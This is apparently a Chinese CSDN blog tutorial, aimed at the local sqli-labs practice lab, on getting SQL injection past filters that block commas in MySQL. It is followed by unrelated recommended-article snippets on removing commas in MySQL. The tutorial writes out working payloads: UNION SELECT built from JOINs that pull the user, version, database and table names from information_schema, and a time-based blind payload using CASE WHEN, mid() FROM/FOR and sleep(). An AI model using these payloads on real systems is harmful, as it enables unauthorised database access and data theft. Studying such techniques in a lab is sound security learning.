mysql 去除逗号_mysql注入之过滤逗号

最新推荐文章于 2022-07-22 14:02:52 发布
最新推荐文章于 2022-07-22 14:02:52 发布
阅读量901 收藏
点赞数
文章标签: mysql 去除逗号
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33988332/article/details/113272501
版权

1.联合查询

无逗号语句:http://127.0.0.1/sqli-labs-master/Less-2/?id=-2 union select * from ( (select user())a JOIN (select version())b JOIN (select database())c ) -- - //我们分别查询user(),version(),database()

dc93ea67c34426be37c5c2eb9ca3a523.png

说明后面两个字段可以显示出来 然后我们进行下一步操作

无逗号语句:http://127.0.0.1/sqli-labs-master/Less-2/?id=-2 union select * from ( (select user())a JOIN (select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1 offset 0)b JOIN (select database())c ) -- -

原本注入语句: http://127.0.0.1/sqli-labs-master/Less-2/?id=-2 union select 1,table_name,3 from information_schema.tables where table_schema=0x7365637572697479 limit 0,1 -- -

999143f94c83cb8a726e6499018f903c.png

所以网上找了下MySQL limit 2种写法

ba8917bbc7a56ea2237d0410dce1fddf.png

当然如果条件允许也可以使用:

http://127.0.0.1/sqli-labs-master/Less-2/?id=-2

union select * from ( (select user())a JOIN (select

group_concat(table_name) from information_schema.tables where

table_schema=0x7365637572697479)b JOIN (select database())c ) --

-这样的语句直接报出所有

报字段和内容也就一样了。

2.盲注

无逗号注入语句:http://127.0.0.1/sqli-labs-master/Less-2/?id=2 and case when mid((select user()) from 2 for 1)='o' then sleep(3) else 0 end -- -

原本注入语句:http://127.0.0.1/sqli-labs-master/Less-2/?id=2 and if(mid((select user()),2,1)='o',sleep(3),0);%23

18ab2065e80df758b20259b5513be347.png

mid((select user()) from 2 for 1) // 从第2位开始取只取1位

case when 条件 then (条件为真输出) else (条件为假输出) end (结束)。

55bd853446849c7ecfb139971144b11e.png

KTunstal
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySql逗号拼接字符串查询的两种方法
12-16
下面两个函数的使用和FIND_IN_SET一样,使用时只需要把FIND_IN_SET换成FIND_PART_IN_SET或FIND_ALL_PART_IN_SET 例如某字段里是为1,2,3,4,5  使用方法: 第一种,传入1,3,6  可以查出来 select * from XXX where FIND_PART_IN_SET('1,3,6','1,2,3,4,5') 第二种,传入1,3,6  查不出来 select * from XXX where FIND_ALL_PART_IN_SET('1,3,6','1,2,3,4,5') 函数: 第一种:只要包含其中一个就可以被查出来
MySQL查询指定字段不是数字与逗号的sql
09-08
今天小编遇到一个问题因为编辑的不细心不小心将关键词写到相关文章里面导致页面无法生成,这里用sql语言将这些内容获取出来
Mysql 取字段值逗号第一个数据的查询语句
09-10
Mysql 取字段值逗号第一个数据,在某些情况下还是比较实用的,主要使用到了left函数及其他等等,感兴趣的朋友可以参考下
SQL 去除字段中符号,只保留数字和字母
05-02
--去除字段中符号,只保留数字和字母sql-- create FUNCTION DBO.REMOVE_SYMBLE(@S VARCHAR(100)) RETURNS VARCHAR(100) AS BEGIN DECLARE @SQL VARCHAR(100) SET @SQL=''
如何修改Mysql中group_concat的长度限制
12-16
mysql中,有个函数叫“group_concat”,平常使用可能发现不了问题,在处理大数据的时候,会发现内容被截取了,其实MYSQL内部对这个是有设置的,默认不设置的长度是1024,如果我们需要更大,就需要手工去修改 详细说明如下: 用了group_concat后,select里如果使用了limit是不起作用的. 用group_concat连接字段的时候是有长度限制的,并不是有多少连多少。但你可以设置一下。 使用group_concat_max_len系统变量,你可以设置允许的最大长度。 系统默认的分隔符是逗号 修改方式: SET [SESSION | GLOBAL] g
mysql+过滤纯标点符号,用正则表达式去除标点符号
weixin_39707941的博客
03-23 1722
近期从事检索工作,需要相应用户的输入请求,返回结果。由于难以预料用户的输入内容,如果不加过滤处理,在检索阶段很可能抛出异常。用户的输入可能风格迥异,最常见的可能算是夹杂各种标点符号的输入了。怎样过滤?在csdn论坛上面看到一贴,综合了一下,得到了下面的正则表达式,也许会帮助你解决问题:\\pP|\\pS我们用一个例子演示此正则表达式用法:public static void main(String...
解决MySQL中 GROUP_CONCAT方法拼接字符传,第一位或最后一位会有逗号问题
weixin_50420750的博客
10-22 2971
解决MySQL中 GROUP_CONCAT方法拼接字符传,第一位或最后一位会有逗号问题 例 select f.fld_guid as fldGuid, o.fld_name as ownerName, convert(f.fld_amount, decimal(18,2)) as amount, GROUP_CONCAT(d.fld_bill_no2) as billNo2 from es_charge_incoming_fee f left join es_charge_incoming_data
mysql 去掉多余的逗号,如何删除mysql查询中的空逗号
weixin_35519827的博客
01-19 838
actual data (,,,demo, ,xxxx,,,yyy,,,) to be (demo,xxxx,yyy)What I have tried:i had triedSELECT TRIM(BOTH ',' FROM ',,,demo, ,xxxx,,,yyy,,,');SELECT REPLACE(TRIM(TRIM(',' FROM ',,,demo, ,xxxx,,,yyy,,,'...
mysql 去除逗号,MySQL查询删除字符串中最后一个逗号后的所有字符?
weixin_29758513的博客
03-17 2691
要删除字符串中最后一个逗号之后的所有字符,可以使用SUBSTRING_INDEX()。如果您不知道最后一个逗号的位置,则需要使用来动态查找最后一个逗号LENGTH()。语法如下-UPDATEyourTableNamesetyourColumnName=SUBSTRING_INDEX(yourColumnName,',',LENGTH(yourColumnName)-LENGTH(RE...
mysql:去除查询字段中前后逗号
erdong45684455的博客
08-19 2958
因为我们的数据库中有个字段的存储方式为‘,2017,2018,2019,’,但是在查询出来展示的时候肯定不能这样展示,所以我就想在查询的时候去除这个字段前后的逗号,百度了很久没有找到答案,经过一位大神的提点,终于找到了方法,sql如下: SELECT t.content singleContent, t.id singleId, t.has_error singleHasError, t.checked singleChecked, TRIM(BOTH ',' FROM t.`year`)
mysql 批量去除特殊符号
Analyser_wu的专栏
07-29 1210
在数据清洗常遇到诸如此类内容 :'花果????','禽副食????',' 鸭鹅????',' 牛羊肉????',如果要去掉此类符号需怎么操作呢? 直接上代码: 使用 convert 将字符转成可识别中文的编码,转换之后符号变成 “?”,再使用replace 替换掉“?” 转换成功 ...
MYSQL中有时候不得不使用replace()去掉特殊字符,写在这里备用一下
黄饱饱
01-06 904
LOWER()的作用是把所有的大小写统统变成小写; LOWER(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace( replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replac...
mysql 去掉数据特殊字符
dream_snow2012的专栏
12-10 2340
UPDATE table_name SET role_code = REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(role_code,CHAR(9),''),CHAR(10),''),CHAR(13),''),' ',''),'\r\n','')
mysql必知必会笔记
weixin_47680367的博客
07-22 6497
mysql
MySQL拼接字符串,GROUP_CONCAT
weixin_43526979的博客
04-29 2394
​ 两位员工馮大和馮二也要面对无情的 KPI 考核了为例进行,他们工作干得很不错,performance 分别是 4 和 5 ​ 领导想要查看每个 performance 下都有谁,同时要求将这些人的名称要逗号拼接成一个字符串,也就是说要得到下面的结果: ​ 要将结果集中某个指定的列进行字符串拼接,这要怎么做呢? GROUP_CONCAT(expr) ​ 在 Mysql 官方文档 中,该...
mysql查询忽略符号_MySql的搜索忽略标点,符号和空格,而在DB数据有特殊的charactors...
weixin_39907713的博客
01-21 971
我有库存超过40万条记录,其不断使用CSV文件(文件在每次1万个数据)更新一个巨大的InnoDB表。我们使用Load Data Infile方法将数据导入表格。MySql的搜索忽略标点,符号和空格,而在DB数据有特殊的charactors表中有一个名为part_number的字段,它是每个库存项目的唯一标识符。在此字段中的数据包含了像一个或多个特殊字符“ - ”,“_”,“#”,“$”,”“等。如...
mysql去除数据中的tab、空格、回车符等特殊字符
大洋
04-27 5402
举例:删除tab空格: update table set clo= REPLACE(clo,char(9),‘’); 去掉tab符号为 select REPLACE(‘要替换的字符或列名’,char(9),’替换的目标字符’) 去掉空格符号为 select REPLACE(‘要替换的字符或列名’,char(32),’替换的目标字符’) 去掉换行符号为 select REPLACE(‘要替换的字符或列名’,char(10),’替换的目标字符’) 按照ASCII码 ...
mysql注入过滤逗号,SQL注入简单总结——过滤逗号注入
weixin_33806343的博客
03-18 892
最近做了一些CTF题目,发现sql题目很喜欢出过滤","的题目,借此机会特此总结。并且我有一个想法能够通过编写tamper尽量多的解决sql注入的题目。在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决:select substr(database() from 1 for...
mysql中group_concat前后逗号问题
最新发布
01-13
MySQL中,group_concat函数用于将多行数据按照指定的分隔符连接成一行。关于group_concat函数的语法和基本查询,你已经提供了引用中的内容。而关于group_concat函数在处理大数据时可能出现的内容被截取的问题,你...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值